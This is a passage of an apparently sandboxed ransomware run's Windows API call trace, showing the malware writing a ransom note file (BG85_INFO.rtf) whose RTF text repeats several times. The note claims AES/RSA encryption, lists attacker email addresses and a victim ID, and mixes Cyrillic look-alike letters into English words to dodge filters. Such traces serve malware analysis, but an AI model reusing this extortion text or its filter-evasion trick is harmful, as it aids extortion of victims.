y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.711] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.713] CloseHandle (hObject=0x1dc) returned 1 [0065.713] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\bg85_info.rtf")) returned 0xffffffff [0065.713] GetLastError () returned 0x2 [0065.713] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your 